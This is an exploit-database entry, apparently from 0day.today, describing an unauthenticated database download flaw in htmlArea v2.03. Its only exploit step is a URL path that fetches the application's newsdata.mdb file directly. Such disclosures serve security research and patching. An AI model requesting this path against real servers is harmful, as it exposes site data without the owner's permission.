id: 10495
date: 12/29/2009
title: htmlArea v2.03 DB Download Vulnerability
author: indoushka
cves: 

========================================
htmlArea v2.03 DB Download Vulnerability
========================================

========================================================================================                 
| # Title    : htmlArea v2.03 DB Download Vulnerability                                |
| # Author   : indoushka                                                               |
| # Script   : htmlArea v2.03                                                          |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : DB                                                                      |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://server/htmlArea/data/newsdata.mdb



#  0day.today [2023-03-23]  #